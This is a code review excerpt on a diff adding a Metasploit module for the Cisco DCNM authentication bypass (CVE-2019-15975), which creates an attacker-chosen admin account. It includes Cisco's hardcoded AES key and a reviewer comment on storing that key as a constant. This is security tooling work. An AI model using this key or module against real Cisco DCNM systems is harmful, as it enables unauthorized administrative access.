modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb

```diff
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'securerandom'
+require 'base64'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco DCNM auth bypass',
+        'Description' => %q{
+          This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.
+          After that, you can login to the web interface with those credentials.
+          The only necessary condition is the more or less recent connection of an admin as this exploit
+          uses a kind of session stealing.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'MR_ME', # Amazing POC on www.exploit-db.com
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2019-15975']
+          ],
+        'DisclosureDate' => '2020-06-01',
+        'DefaultOptions' => { 'SSL' => true }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('NBRETRIES', [true, 'Maximum number of attempts', 50]),
+      OptString.new('TARGETURI', [true, 'The base path of the Cisco DCNM', '/']),
+      OptString.new('USERNAME', [true, 'The username of the admin account you want to add', 'hacker']),
+      OptString.new('PASSWORD', [true, 'The password of the admin account you want to add', 'Hacked123'])
+    ])
+  end
+
+  class AESCipher
+    def initialize
+      # Cisco's hardcoded key
+      @key = 's91zEQmb305F!90a'
```

Comment:
A key like this should be a constant and frozen like `KEY = 's91zEQmb305F!90a'.freeze` instead of an instance attribute.

Reply:
Fixed !